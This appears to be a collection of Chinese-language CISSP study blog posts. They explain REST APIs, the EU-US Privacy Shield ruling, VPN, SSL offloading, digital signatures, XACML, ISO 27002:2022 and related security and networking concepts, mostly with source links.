分類
CISSP

API 是什麼? RESTful API 又是什麼?

API 是什麼?

API,全名 Application Programming Interface (應用程式介面),簡單來說,是品牌開發出的一種接口,讓第三方可以額外開發、應用在自身的產品上的系統溝通介面。

來看個短短的、清楚直白的敘述影片:API 就是你的餐廳服務生💁

https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fwww.youtube.com%2Fembed%2FzvKadd9Cflc%3Ffeature%3Doembed&url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DzvKadd9Cflc&image=https%3A%2F%2Fi.ytimg.com%2Fvi%2FzvKadd9Cflc%2Fhqdefault.jpg&key=a19fcc184b9711e1b4764040d3dc5c07&type=text%2Fhtml&schema=youtube

以實際應用的範例而言,Google Map API 就很好理解了,常常可以在各式不同的網站看見 Google Map 應用,很多都是接 Google Map API 的範例,營運考量上,有可能 API 會限制一定使用流量以內免費,超過即收費,Google map 也是如此。

點我查看 Google Maps API 收費標準

在 RESTful API 之前,要再理解一下 HTTP,HTTP 是一種協定,全名 Hypertext Transfer Protocol(超文本傳輸協定),網路世界其實就分為客戶端、伺服器端,舉例說,客戶端就是我,伺服器端就是 Yahoo,我要看 Yahoo 的首頁,我就是向 Yahoo 的伺服器端傳送了這個要求,Yahoo 再回應資源給我。為了讓要求和回應統一規範,就有了 HTTP。

舉例,假設我要吃滷味:

  • 在瀏覽器輸入 Yahoo 網址,按下 enter,送出 request (跟老闆說我要切兩塊百頁豆腐)
  • 伺服器收到 request 檢查該網址是否存在(老闆轉身看百頁豆腐還有沒有)
  • 伺服器發 response 回來(百頁豆腐切好了)

跟老闆點餐的方式,有一定的規範跟方式,像是我一定要用講的,不可以用比的,我要說中文,不可以說英文,這就是 HTTP 協定。

如果伺服器發現網址不存在(老闆發現百頁豆腐賣完了),就會回傳 HTTP status code 狀態碼 404:

狀態碼又會再分為下幾種:

2xx = Success(成功)
3xx = Redirect(重定向)
4xx = User error(客戶端錯誤)
5xx = Server error(伺服器端錯誤)

在 HTTP 中,會有很多種 method 做為請求的方法,常用的幾個動作分別為:GET / POST / PUT / DELETE,正好會對應到資料庫基本操作 CRUD 增刪查改。

CRUD 為 Create(新增)、Read(讀取)、Update(更新)與Delete(刪除)的縮寫

那 RESTful API 又是什麼?

先來看是誰發明的↓

Roy Thomas Fielding,他是HTTP協議(1.0版和1.1版)的主要設計者、Apache服務器軟件的作者之一、Apache基金會的第一任主席,REST這個詞是他在2000年的博士論文中提出的。

REST,全名 Representational State Transfer( 表現層狀態轉移),他是一種設計風格,RESTful 只是轉為形容詞,像是 peace 和平這名詞,轉成形容詞是 peaceful,RESTful 則形容以此規範設計的 API,稱為 RESTful API。

先用白話來說,以剛剛 API 影片中的餐廳服務生為例,如果使用一般的 API 點菜,我要加點查看已點菜色修改已點菜色取消已點菜色,都需要不同的服務生替我服務,可能加點的服務生是 John、查看已點菜色是 Annie….等,RESTful API,就是讓這些動作,都可以由同一位服務生完成。

RESTful API 主要由三種元件組成:

  1. Nouns 名詞:定義資源位置的 URL,每個資源在網路上都會有唯一的位置,就如每戶人家都有唯一的地址一樣。
  2. Verbs 動詞:對資源要做的動作。
  3. Content Types 資源呈現方式:API 資源可以以多種方式表現,最常用的是 JSON,較輕,也較好處理。

一般的 API,可能會是這樣:

獲得資料GET    /getData
新增資料POST /createData
刪除資料DELETE /deleteData/1

不同公司,不一樣的工程師,設計的名稱都會不一樣,沒有統一的命名方式,造成在引用各家 API 時,都需要詳讀 API 文件,理解所有設計命名規則後,才可使用。

若以 RESTful API 風格開發的話:

獲得資料GET     /data
新增資料POST /data
刪除資料DELETE /data/1

就是用一個唯一的 URL 定位資源,將動作藏在 HTTP 的 method 裡面。

所以使用 RESTful 風格設計的 API,就有了以下幾種優點及限制:

1. 有唯一的URL表示資源位置,統一的 API 接口。(Uniform Interface)

2. 無狀態。(Stateless)

RESTful 的狀態,意即 HTTP 的請求狀態,一般 Web 服務中,Server 端和 Client 端交互的資訊,會存在 Server 端的 Session (例如:已登入狀態),在 Client 端再次發送請求的時候,Server 端透過保存在 Server 端的 Session,去執行 request。無狀態的意思,即 Client 端自行保存狀態,在請求 Server 的時候,一併附上給 Server 端,Server 端無保存 Client 端的狀態資訊。

舉例來說,可能在用戶登錄系統時,Server 產生 token 紀錄 user 已登錄系統,然後把 token 還給 Client,在 Client 再次發送請求的時候,把 token 一起發給 Server,這樣 Server 就知道這一個 Client 是已經處於登錄的狀態。

意即所有的資源都可以 URI 定位,而且這個定位與其他資源無關,也不會因為其他資源的變化而變化,資源相互的依賴性降低。

舉一個白話一點的例子:查詢員工工資:
第一步:登錄系統。
第二步:進入查詢工資的頁面。
第三步:搜索該員工。
第四步:點擊姓名查看工資。

這樣的操作流程就是有狀態的,查詢工資的每一個步驟都依賴於前一個步驟,只要前置操作不成功,後續操作就無法執行。如果輸入一個URL就可以直接得到指定員工的工資,這種情況就是無狀態的,因為獲取工資不依賴於其他資源或狀態,這種情況下,員工工資是一個資源,由一個 URL 與之對應可以通過 HTTP 中的 GET 方法得到資源,這就是典型的 RESTful 風格。

3. 可更高效利用快取來提高回應速度 (Cachable)

在 server-side,GET 過的資源,如果沒有被變更過,可以利用 cache 機制減少 request。
在 client-side,透過 client 端 cache 紀錄 cache 版本,若向 server 要求資源時發現 server 最新版與 cache 相同,則 client 端直接取用本地資源即可,不需要再做一次查詢

4. 分層系統架構 (Layered System)

5. 客戶端服務器分離 (Client-Server)

6. 充份利用 HTTP protocal(GET/POST/PUT/DELETE) (Manipulation of resources through representations)

7. 可執行程式碼的設計,像是 JavaScript(非必要實作項目) Code-On-Demand (optional)

參考文章:
https://zh.wikipedia.org/wiki/%E8%A1%A8%E7%8E%B0%E5%B1%82%E7%8A%B6%E6%80%81%E8%BD%AC%E6%8D%A2
https://tw.alphacamp.co/blog/2016-10-25-coding-basics-for-marketers-1
https://ithelp.ithome.com.tw/articles/10157431
https://www.itread01.com/content/1544242329.html
https://progressbar.tw/posts/53
https://blog.csdn.net/hjc1984117/article/details/77334616
https://www.zhihu.com/question/28557115
https://blog.csdn.net/hjc1984117/article/details/77334616
http://www.ruanyifeng.com/blog/2011/09/restful.html
https://blog.toright.com/posts/5523/restful-api-%E8%A8%AD%E8%A8%88%E6%BA%96%E5%89%87%E8%88%87%E5%AF%A6%E5%8B%99%E7%B6%93%E9%A9%97.html
https://blog.csdn.net/Jmilk/article/details/50461577
https://blog.csdn.net/matthew_zhang/article/details/63410421

資料來源:https://medium.com/itsems-frontend/api-%E6%98%AF%E4%BB%80%E9%BA%BC-restful-api-%E5%8F%88%E6%98%AF%E4%BB%80%E9%BA%BC-a001a85ab638

分類
CISSP

歐盟-美國隱私護盾

歐盟-美國隱私護盾是監管歐盟美國之間出於商業目的跨大西洋交換個人數據的法律框架。[1]其目的之一是使美國公司能夠根據旨在保護歐盟公民的歐盟隱私法更輕鬆地從歐盟實體接收個人數據。[2]歐盟-美國隱私護盾在獲得歐盟委員會批准後於 2016 年 7 月 12 日生效。它取代了被歐洲法院宣布無效的國際安全港隱私原則2015 年 10 月。[3]歐洲法院於 2020 年 7 月 16 日宣佈歐盟-美國隱私護盾無效,案件稱為Schrems II[4] 2022 年,美國和歐盟領導人宣布已同意一個名為跨大西洋數據隱私框架的新數據傳輸框架,以取代隱私盾。

資料來源:https://en.wikipedia.org/wiki/EU%E2%80%93US_Privacy_Shield

分類
CISSP

歐盟法院廢除與美國之間的Privacy Shield資料傳輸協議

歐盟法院認為美國並無法提供與歐盟一致的隱私保障,特別是歐盟民眾的個資可能受到美國情報機構的窺探,因而決定廢除《隱私盾》(Privacy Shield)資料傳輸保護協議

歐盟法院(CJEU)在7月16日廢除了歐盟與美國之間的《隱私盾》(Privacy Shield)資料傳輸保護協議,這是由歐盟執委會(European Commission,EC)、美國商務部及瑞士在2016年所建立的框架,雙方同意將基於歐盟的隱私法令,簡化美國企業將歐洲民眾資料傳送到美國的流程,以支持跨大西洋貿易。然而,CJEU認為美國並無法提供與歐盟一致的隱私保障,特別是歐盟民眾的個資可能受到美國情報機構的窺探,因而決定將它廢除。

其實為了方便歐盟與美國之間的個資傳輸,雙方在2000年時曾推出《安全港隱私準則》(Safe Harbour Privacy Principles),但一名奧地利的隱私權捍衛人士Max Schrems在2011年時,於2個月內接連向愛爾蘭的資料保護局提出22項隱私控訴,指控臉書並未好好保障他的隱私,再加上美國吹哨者Edward Snowden在2013年時爆料美國國安局的Prism計畫可監控美國9大科技公司的通訊,讓Schrems針對PRISM再度提出第23次的控訴,雖然Schrems在愛爾蘭的訴訟案全都以失敗收場,卻促使愛爾蘭法院把有關《安全港隱私準則》的問題轉給了歐盟法院。

Schrems繼續在2014年對臉書發動集體訴訟,而歐盟法院也開始在2015年正視《安全港隱私準則》,認為是該準則讓Prism計畫得以實現,於是在同年廢除了《安全港隱私準則》。

歐盟與美國接著在2016年提出《隱私盾》以取代《安全港隱私準則》。不過,Schrems並不罷休,在2018年又控告了臉書侵犯隱私,同時宣稱《隱私盾》依然無法完全保障歐洲民眾的隱私權,這一次,歐盟法院再度廢除了《隱私盾》。

歐盟法院解釋,居住在奧地利的Schrems從2008年以來就是臉書的用戶,但臉書卻把他的部份或全部資料從愛爾蘭(臉書的歐洲總部)轉到美國處理,Schrems認為美國的法令並未提供足夠的隱私保護,因此要求禁止資料的轉移。另一方面,美國法令對於公家機關存取歐洲民眾資料的保護有限,並不符合歐盟要求移轉資料的第三方,必須具備與歐盟隱私法令(GDPR)同等級保護的規定,因而認定《隱私盾》協議是無效的。

值得注意的是,此案並未波及美國與歐盟之間的必要資料傳輸,像是電子郵件、傳訊、在美國平臺上預訂飯店,或是其它標準的商業交易,也不影響那些不含個人資訊的資料傳輸,主要波及的是外包業務,例如為了經濟之故,把個資存放在較便宜的美國服務上,或者是傳到美國以方便處理等業務。

此外,Schrems所指控的協議並不只歐美之間的《隱私盾》,他還指控了歐盟與任何第三方國家之間有關個資傳輸的《標準合約條款》(Standard Contractual Clauses,SCCs),儘管外界質疑SCCs與《隱私盾》一樣,都可能讓歐洲民眾的個資落入美國的監控,但這次歐盟法院放行了SCCs。

儘管微軟很快在歐盟法院裁決出爐的同一天就發表了聲明,表示該公司同時提供了《隱私盾》與《標準合約條款》的雙重保障,因此,透過微軟雲端服務在歐盟及美國之間傳遞資料的商業客戶,並不會受到此案的影響。

然而,非營利的歐洲數位權利中心(European Center for Digital Rights,ECDR)認為,此一裁決將衝擊所有在歐盟設立子公司的美國企業,這些企業必須確保歐洲民眾個資在內部的流通符合GDPR規範,例如把個資傳送到其它隱私法令更嚴格的地方,而非美國。

ECDR強調,歐盟法院放行SCCs是因為它涉及美國之外的其它國家,這些國家可能具備與GDPR同等級或更嚴格的隱私法令,並不代表美國業者可利用SCCs把歐洲民眾的個資傳到美國,因為根據歐盟法院的意見,撤銷《隱私盾》的主因在於美國對情報需求的監控法令不夠嚴格,也看不出對監控權力的限制,看起來比較像是只要是落入美國政府監控範圍的企業不只失去了《隱私盾》,也無法再使用SCCs。

資料來源:https://www.ithome.com.tw/news/138915

分類
CISSP

VPN

VPN就是透過tunneling技術, 把公眾/共用網路當作(模擬成)網路線來連接公司的電腦及網路. 由於使用公眾/共用網路, 因此必須搭配安全服務(如身份驗證, 金鑰交換, 加密, 完整性控制)才能安全地在tunnel上傳輸資料.
VPN = 建立私有通道(tunneling) + 提供安全服務(security services)
https://wentzwu.com/2022/05/18/vpn-tunneling-and-security-services/

分類
CISSP

誤用案例測試(Misuse case testing)最不可能包含在軟體整合測試(integration test)中

https://ithelp.ithome.com.tw/upload/images/20220516/20132160PpNzkjpdhw.jpg
-代碼倉庫:git
顧名思義,整合測試結合了代碼單元、模組或子系統並對其進行測試。在託管代碼儲存庫的服務器上進行整合測試是很常見的,例如 git 服務器。
在持續整合設置中,當滿足構建標準(夜間構建或新代碼簽入)時,服務器開始構建代碼並運行簽入代碼存儲庫的所有單元測試。如果構建或任何測試失敗,則會向相關方發送通知以解決問題,直到一切正常;這種迭代過程稱為回歸測試

模組或子系統通常通過所謂的 API(應用程序編程接口)相互通信。API 測試沒有用戶界面,依賴於測試工具來提供數據作為輸入並接收結果作為輸出。Fuzzer 是Fuzz 測試中使用的工具,可幫助生成隨機測試數據以饋入接口測試。

系統測試在整合測試完成後開始,例如壓力測試、性能測試、安全測試等。大部分系統測試任務都可以自動化。一旦自動化任務完成,測試人員就會參與進來。他們根據包含一個或多個場景或用例的測試用例來測試系統。誤用案例基本上是採取攻擊者觀點的用例。

參考
誤用案例
整合測試
系統測試

資料來源: Wentz Wu QOTD-20211024

分類
Information Security

IP 流資訊導出(IP Flow Information Export)

Internet 協議流信息導出(IPFIX) 是IETF協議,也是定義該協議的 IETF工作組的名稱。它是基於對來自路由器、探測器和其他設備的Internet 協議流信息的通用、通用導出標準的需要而創建的,這些設備由中介系統、計費/計費系統和網絡管理系統使用,以促進測量、計費等服務。和計費。IPFIX 標准定義瞭如何格式化 IP 流信息並將其從導出器傳輸到收集器。[1]以前,許多數據網絡運營商都依賴Cisco Systems的專有用於交通流信息導出的 NetFlow技術。

原始 RFC 3917 中概述了 IPFIX 標準要求。Cisco NetFlow版本 9 是 IPFIX 的基礎。IPFIX 的基本規範記錄在 RFC 7011 到 RFC 7015 和 RFC 5103 中。

資料來源:https://en.wikipedia.org/wiki/IP_Flow_Information_Export

分類
一般

領導與管理的心得

領導與管理的心得:
領導力(leadership)就是影響力。管理是達成目標的一套有系統的方法,最常的方法是PDCA. 因此,目標及事情才需要被管理;人需要的是被影響、被感動,一起為美好的未來而努力!
領導人(leader)需要明白自己的價值觀及使命、能擘劃美好未來的願景,並具備說故事的能力,以及說到作到的執行力才能感動人,讓大家一起為了共同的目標與願景而努力。
影響力的來源有很多,可以是高貴的道德情操、人格特質、技術能力,或制度上的職稱或權力等。透過這些影響力讓大家願意一起前衝就是領導的本質與內涵。

分類
CISSP

死結(Deadlock)是開發人員進行結對編程(pair programming)時,是最難發現的問題。

https://ithelp.ithome.com.tw/upload/images/20220510/20132160mT0RciweIO.jpg
-XP 實踐(來源:https ://twitter.com/CharlotteBRF )
結對編程是眾所周知的極限編程 (XP) 實踐之一。這也是一種實時代碼審查的實踐;同行開發人員在其他開發人員編寫代碼時即時監控和審查。
命名約定(Naming convention)、SQL 注入(SQL injection)和邏輯炸彈(logic bomb)在源代碼級別很容易被發現。然而,像死鎖這樣的競爭條件通常會不時發生在運行時(動態測試),並且很難在設計時識別(靜態測試)。競爭條件是由多線程、並行編程或多用戶環境導致的並發問題。
參考
代碼審查清單——執行有效的代碼審查
任何開發人員都應該知道的 4 種代碼審查類型
五種審查

資料來源: Wentz Wu QOTD-20211023

分類
Information Security

CISO應優先考量的15大重點策略

資安議題動輒登上新聞版面,CISO因而處境艱難。約 64% 的CISO對未來表示擔憂,公司可能有重大網路安全風險;66% 認為組織未及準備,無法因應危機,上述數據擷取自資安軟體商Proofpoint 2021年《Voice of the CISO Report》的內容。

在 CIO Taiwan 官網閱讀全文 : CISO應優先考量的15大重點策略 https://www.cio.com.tw/ciso-to-prioritize-15-key-strategies/

分類
Information Security

CISO 研討會-Microsoft

資料來源:https://docs.microsoft.com/zh-tw/security/ciso-workshop/ciso-workshop

分類
CISSP

成熟度模型中構建安全性 (Building Security In Maturity Model :BSIMM)

CMMI、CMMC、BSIMM 和 SAMM 是評估軟體開發能力的好模型。但是BSIMM 是衡量一個組織在安全性方面相對於其他組織執行情況的最佳方法。
成熟度模型中的安全構建 (BSIMM) 是對當前軟件安全計劃或程序的研究。它量化了跨行業、規模和地域的不同組織的應用程式安全 (appsec) 實踐,同時確定了使每個組織獨一無二的變化。

BSIMM 包括:
對組織當前的appsec 計劃 提供客觀、數據驅動的評估的評估
成為提供協作、最佳實踐和獨家內容的安全同行社區的成員
全球會議 ,包括來自安全領導者的主題演講、交流機會以及交流技術和實踐的論壇
一份年度報告 (目前為 BSIMM12),提供對現實世界軟件安全計劃、實踐和活動的數據驅動分析
資料來源:BSIMM

參考
OWASP SAMM
網絡安全成熟度模型認證
負責採辦和維持的國防部副部長辦公室 (OUSD(A&S))
關於 BSIMM
能力成熟度模型集成 (CMMI)

資料來源: Wentz Wu QOTD-20211022

分類
Information Security

IPMI

智慧型平台管理介面(Intelligent Platform Management Interface)原本是一種Intel架構的企業系統的週邊裝置所採用的一種工業標準。IPMI亦是一個開放的免費標準,使用者無需支付額外的費用即可使用此標準。

IPMI 能夠橫跨不同的作業系統、韌體和硬體平台,可以智慧型的監視、控制和自動回報大量伺服器的運作狀況,以降低伺服器系統成本。

資料來源:https://zh.wikipedia.org/wiki/IPMI

分類
Information Security

什么是SSL卸载?它的工作原理是什么?有什么好处?

在学习SSL卸载之前,我们应该了解一些基本知识。

一.SSL延迟

互联网迅猛发展的背后隐藏着许多安全隐患,对此,各种加密技术应运而生。SSL(Secure Socket Layer安全套接层)协议便是一种广泛应用于保障互联网交易安全的加密通讯协议。在SSL加密通道内对HTTP进行封装,成为HTTPS,大大提高了数据传输过程中的信息安全性。如今,大量的线上交易业务,如电子商务、股票、证券交易等都采用SSL加密技术来保证敏感数据传输的安全性。

然而,随着SSL通信量规模的日益庞大,其弊端也日益显现,其首要便是SSL延迟。在HTTPS中,完成TCP握手协议后还需完成SSL握手,因此,HTTPS比HTTP耗时;同时,握手之后,服务器须使用额外的处理能力来对传输的数据进行加密和解密,于是SSL的联机加密运算不可避免会消耗服务器的处理性能,直观地说,一台服务器启用SSL加密之后,其性能往往只达到原来的20%,其余80%的计算性能都消耗在了SSL的加密运算方面。尽管TLS1.3(SSL协议的标准化版本)的发布使得系统在进行握手时只需进行一次往返,减少了耗时,并在其他方面进一步提高了性能,但在更高流量的情况下,SSL/TLS仍旧可能会增加延迟。

二.SSL卸载

SSL卸载技术解决了上述问题:通过将HTTPS应用访问过程中的SSL加密解密过程转移到特定的集成电路(ASIC)处理器上,在满足高并发访问需求的同时,为程序或网站释放出处理能力,从而减少服务器端的性能压力,最终提升客户端的访问响应速度。

这一过程有时也称为负载均衡。

但由于SSL对应用层数据进行了加密,使得负载均衡器这样的设备无法提取用户会话中的cookies、URL、路径等信息。因此,通过SSL卸载技术,一方面全面卸除了系统负荷,另一方面也将SSL加密后的数据融入处理器。

三.SSL卸载的工作原理

1.SSL终结

使用SSL卸载功能的应用交付设备充当负载均衡器的角色。

将专用的SSL应用交付设备(采用专用的SSL卸载硬件芯片)置于网络服务器的前端,把所有传入的客户端请求引导到服务器,在服务器之间平衡或分配客户端的负载,使客户端只需要和SSL应用交付设备交互即可。这样,任何服务器的承载能力都不会过载;同时,客户端发起的HTTPS连接,经过SSL应用交付设备处理后,变成明文的HTTP数据,即可被WEB服务程序(例如IIS、APACHE)直接读取,无需特殊的驱动程序来传送和接受网络数据,从而提高服务器性能。

这一过程中,当客户端尝试连接到网站时,首先会连接到SSL应用交付设备——该连接是HTTPS;而交付设备和应用服务器之间的连接是HTTP。其中,SSL应用交付设备充当了SSL终结器的角色,因此这一过程又称为SSL终结。

下面是SSL终结的可视化图:

2. SSL桥接

除了通过HTTP发送流量和请求外,SSL桥接在概念上与SSL终结非常相似,它会在将所有内容发送到应用程序服务器之前,进行重新加密。

下面是SSL桥接的可视化图:

四.SSL卸载的好处

1. 提高服务器性能:通过卸载应用服务器上额外的SSL加密解密任务,使服务器专注于它们的主要功能,降低服务器负荷。
2. 降低管理员操作复杂性:无需管理和配置多个服务器的证书,只需要在前端交付设备上实现即可。

3. 根据使用的SSL应用交付设备(负载均衡器)的不同,它还可以帮助进行HTTPS检查、反向代理、cookie持久性、流量管理等等:在某些情况下,SSL卸载可以帮助进行流量检查。与加密一样重要的是,它有一个主要缺点:攻击者可以隐藏在加密流量中。由于这一点,出现了很多引人注目的漏洞,比如,Magecart就使用HTTPS流量来混淆从各种支付页面中窃取的PCI。

因此,一旦你的组织达到一定的规模,检查HTTPS流量就很有必要了。而实现这一点的最好方法之一就是进行SSL卸载处理,无论是SSL终结还是SSL桥接,都允许你执行流量检查,在处理高并发流量时可以提供极大的帮助。

五.是否使用SSL卸载?

坦率地说,这一切都取决于您网站类型及流量。

像ESPN或CNN这样大型的媒体网站应当非常适合使用负载均衡器,因为它们都能处理大量的流量;另一方面,如果你只是为当地一家面包店运营一个网站,那么让你的服务器去处理所有的事情就可以了——尤其是TLS 1.3进行了改进的情况下。

資料來源:https://www.racent.com/blog/ssl-offloading-bridging-termination

分類
CISSP

網路功能虛擬化(NFV)、軟體定義網路(SDN)、軟體定義邊界 (SDP) 和零信任(Zero Trust)

網路功能虛擬化 (NFV) 通常使用專有服務器來運行網路服務以提高性能。
根據Wikipedia的說法,“NFV 部署通常使用商品服務器來運行以前基於硬體的網路服務軟體版本。”
https://ithelp.ithome.com.tw/upload/images/20220411/20132160I7mF1gb8cP.jpg
-SDN架構
https://ithelp.ithome.com.tw/upload/images/20220411/20132160sxIHnjir1m.jpg
-SDP架構
https://ithelp.ithome.com.tw/upload/images/20220411/20132160OexcWsGxaz.jpg
-核心零信任邏輯組件(來源:NIST SP 800-207)

參考
軟體定義網路
軟體定義的邊界:SDP 的架構視圖
SDP 和零信任
軟體定義邊界 (SDP):創建新的網路邊界
SDP(軟體定義定義)讓SDN更安全,你的對面不能是一條狗!

資料來源: Wentz Wu QOTD-20211018

分類
Cissp-WentzWu

數位簽章

若Alice要對合約進行數位簽章, 必須先了解什麼是數位簽章. 之後Bob收到Alice所送來的合約, 以及數位簽章才能驗證合約的不可否認性(即資料完整性, 傳送方的真實性, 以及技術/法律上的不可否認性.

  1. 何謂數位簽章: 要進行數位簽章的那一方, 使用其私鑰, 將要簽章的文件之雜湊進行加密, 所產生的密文就叫數位簽章. (技術定義: 被私鑰加密的雜湊)
  2. Alice要作數位簽章, 必須把合約, 以及新產生的數位簽章傳給Bob
  3. Bob不只會數位簽章, 還會收到合約本身.
  4. Bob收到合約及數位簽章後, 再使用Alice的公鑰將數位簽章解密(得到雜湊), 並重新計算合約的雜湊. 如果解密後的雜湊跟新計算的雜湊相同, 表示合約沒有被改, 傳送方身份為真(因為用Alice私鑰才能解密), 而且不可否認.
分類
Information Security

NetFlow

NetFlow是一種網路監測功能,可以收集進入及離開網路界面的IP封包的數量及資訊,最早由思科公司研發,應用在路由器交換器等產品上。經由分析Netflow收集到的資訊,網路管理人員可以知道封包的來源及目的地,網路服務的種類,以及造成網路壅塞的原因[1]

資料來源:https://zh.wikipedia.org/wiki/NetFlow

分類
Information Security

X-Forwarded-For

X-Forwarded-ForXFF)是用來辨識通過HTTP代理負載均衡方式連接到Web伺服器的客戶端最原始的IP位址HTTP頭欄位Squid快取代理伺服器的開發人員最早引入了這一HTTP頭欄位,並由IETF在HTTP頭欄位標準化草案[1]中正式提出。

當今多數快取伺服器的使用者為大型ISP,為了通過快取的方式來降低他們的外部頻寬,他們常常通過鼓勵或強制使用者使用代理伺服器來接入網際網路。有些情況下,這些代理伺服器是透明代理,使用者甚至不知道自己正在使用代理上網。

如果沒有XFF或者另外一種相似的技術,所有通過代理伺服器的連接只會顯示代理伺服器的IP位址,而非連接發起的原始IP位址,這樣的代理伺服器實際上充當了匿名服務提供者的角色,如果連接的原始IP位址不可得,惡意存取的檢測與預防的難度將大大增加。XFF的有效性依賴於代理伺服器提供的連接原始IP位址的真實性,因此,XFF的有效使用應該保證代理伺服器是可信的,比如可以通過建立可信伺服器白名單的方式。

資料來源:https://zh.wikipedia.org/wiki/X-Forwarded-For

分類
CISSP

XACML 可擴展存取控制標記語言

https://ithelp.ithome.com.tw/upload/images/20220301/20132160JMbwM8Q85Q.jpg
-示例 XACML 實現
XACML主要用於授權而不是身份驗證。可以實施 PKI 以支持相互身份驗證。802.1X,又名 EAP over LAN,是一種基於 EAP 的網路存取控制標準。HTTP Basic Authentication 是一種純文本的身份驗證方案;但是,它可以受到 TLS/SSL 的保護。

XACML 代表“可擴展存取控制標記語言”。該標准定義了一種聲明性的細粒度、基於屬性的存取控制策略語言、一種體系結構和一個處理模型,描述瞭如何根據策略中定義的規則來評估存取請求。
作為已發布的標準規範,XACML 的目標之一是促進多個供應商的存取控制實現之間的通用術語和互操作性。XACML 主要是基於屬性的存取控制系統 (ABAC),也稱為基於策略的存取控制 (PBAC) 系統,其中與用戶或操作或資源相關聯的屬性(數據位)被輸入到決定是否給定用戶可以以特定方式存取給定資源。基於角色的存取控制 (RBAC) 也可以在 XACML 中實現,作為 ABAC 的專門化。
XACML 模型支持並鼓勵將執行 (PEP) 與決策 (PDP) 與授權的管理/定義 (PAP) 分離。當訪問決策在應用程序中硬編碼(或基於本地機器用戶 ID 和存取控制列表 (ACL))時,當管理策略發生變化時很難更新決策標準,並且很難實現對應用程序的可見性或審計授權到位。當客戶端與存取決策分離時,授權策略可以即時更新並立即影響所有客戶端。
資料來源:維基百科

資料來源: Wentz Wu QOTD-20211010

分類
Information Security

新版ISO 27002:2022出爐,資安控制措施正式修訂為4大類93項

距離2013年版相隔已8年,新版ISO 27002:2022將控制措施集中於組織層與技術層,控制項目數量則有進一步的綜合整理歸納,並因應網路攻擊手法與樣態新增11項控制,同時提供屬性標籤能讓控制項目更容易使用。

去年底,傳出國際資安標準ISO 27002改版在即的消息,在2月15日,新版ISO 27002:2022悄悄發布。在國際標準組織(ISO)網站上,我們可看到此標準目前已邁入60.60修訂階段,這也是ISO27002推出後的第二度改版——在此之前,這套標準有最初發布的2005年版,以及後續改進的2013年版。

同時,ISO 27001的改版動向也備受關注,雖然ISO官網上未顯示2022版資訊,但根據英國標準協會臺灣BSI表示,後續新版將進行部分修訂,改版時間不會太長,目前預估是今年下半就會發布。

新版管控項目將結構精簡,聚焦讓組織採用更容易

基本上,ISO 27002是資訊安全管理系統(ISMS)的實務指導文件,並作為ISO/IEC 27001國際標準附錄A的詳細參考資訊,提供控制措施選擇的具體參考。

這次ISO 27002改版計畫,從2018年開始啟動,直到去年草案版本發布,開始受到各界關注,畢竟距離上一版本的推出相隔8年,如今ISO 27002:2022版修訂完成,正式發布。

關於新版的變化,BSI表示,首先,標準名稱改為「資訊安全、網路安全及隱私保護-資訊安全控制措施」,以更符合現代的資安管理需求。

其次,在內容的修訂上,ISO 27002:2022的修訂目標,聚焦於讓組織更容易採用,並確保必要控制措施不會忽略。

簡單來說,新版簡化控制措施架構,從原有的14條款類別,重新調整為4大類別,分別是組織控制、人員控制、實體控制與技術控制,而整體控制項目則從114個減到93個,藉此強化資安管控有效性,並將不適合當前環境的內容刪除,當中更新58個控制項目,並將多個控制項目併為24個控制項目,並新增11個控制項目。

這些新增項目,主要是為對應當前的網路攻擊手法與樣態,控制項目包含了威脅情資、雲端服務使用的資安、資通訊技術營運持續整備、實體安全監控、組態管理、資訊刪除、資料遮罩、資料外洩防護、活動檢視、網站過濾與安全程式碼撰寫,以確保組織能持續具有能力,控制自身的資訊安全。

新版現在也增加屬性標籤,包括控制類型(預防、偵測與矯正)、資安特性(機密性、完整性、可用性,CIA)、網路安全概念(識別、保護、偵測、回應、復原,NIST CSF)、執行能力,以及安全領域。讓企業組織可從不同角度,快速過濾相關控制措施,以及執行排序呈現,讓組織更方便找出相關控制要求。

目前看來,新版正式發布內容與草案版本大致相當,不過我們發現,在這93項控制措施中,8.22 Segregation in networks,與8.23 Web filtering,兩者的順序對調,與草案版本不同。BSI表示,其實在最終草案版本時,條文順序就已變動。

另一個標準ISO 27001改版時程終於明朗

至於各界關注的ISO 27001改版時程,BSI表示,目前獲知的時間在2022年第三季到第四季,可能與後續投票時程有關,若有進展會再更新。

至於ISO 27001預估將修訂的內容,主要依據ISO/IEC 27002:2022修訂部分,反映於ISO/IEC 27001的附件A,也將涵蓋2014年與2015年發布的2個小勘誤。

由於ISO 27002:2022已經發布,新版ISO 27001也預期會在今年修訂完成,對於已取得ISO 27001驗證的企業組織而言,除了可準備轉版認證審查,確保企業驗證範圍的控制措施與資訊安全管理系統符合新版的標準,也應朝向全公司驗證範圍目標邁進;而正在導入實施ISMS或進行ISO/IEC 27001驗證的企業,現在也可選擇參考ISO/IEC 27002:2022。

BSI表示,由於每個標準改版的幅度不同,根據過往經驗,新標準正式公布後,企業組織都會有2到3年的時間來進行改版;若組織能力與預算可行,先以新版ISO 27002:2022的指引來著手接下來的資安工作,是可以這麼做。

關於ISO 27001的相關消息,後續我們在ISO官方網站找到相關資訊,目前ISO 27001:2013版已有增修1草案(DAMD 1),目前進度是2022年2月3日的40.20階段,目前正進行草案(DIS)版本投票。

資料來源:https://www.ithome.com.tw/news/149520?fbclid=IwAR23_hQ6I4xKJc27rbFDFHMyf5DGCA4hdGmT3j7P5zTZbGOJOTFesaI05IM

分類
CISSP

X.509 標準中未定義可分辨編碼規則(Distinguished encoding rules)

PKI 證書編碼(PKI Certificate Encoding)
X.509 標準中未定義的一個值得注意的元素是證書內容應如何編碼以存儲在文件中。但是,通常有兩種編碼模式用於將數字證書存儲在文件中:
可分辨編碼規則 (Distinguished Encoding Rules:DER) – 最常見,因為架構處理大多數數據對象。DER 編碼的證書是二進製文件,不能被文本編輯器讀取,但可以被 Web 瀏覽器和許多客戶端應用程序處理。
隱私增強郵件 (Privacy Enhanced Mail:PEM) – 一種加密的電子郵件編碼模式,可用於將 DER 編碼的證書轉換為文本文件。
資料來源:Sectigo

參考
什麼是 X.509 證書及其工作原理?
SSL 證書文件擴展名說明:PEM、PKCS7、DER 和 PKCS#12
數字證書

資料來源:Wentz Wu QOTD-20211009

分類
CISSP

配置管理(Configuration management)是編排器(orchestrator )管理容器化(containerized)應用程序的最關鍵推動力

在部署基於容器的應用程序時,我們可以使用容器編排器來配置和管理容器。這意味著變更請求已獲批准和實施,集成和測試已完成,並且已授予操作授權 (ATO)。使用編排器有效地部署基於容器的應用程序依賴於良好的配置管理。
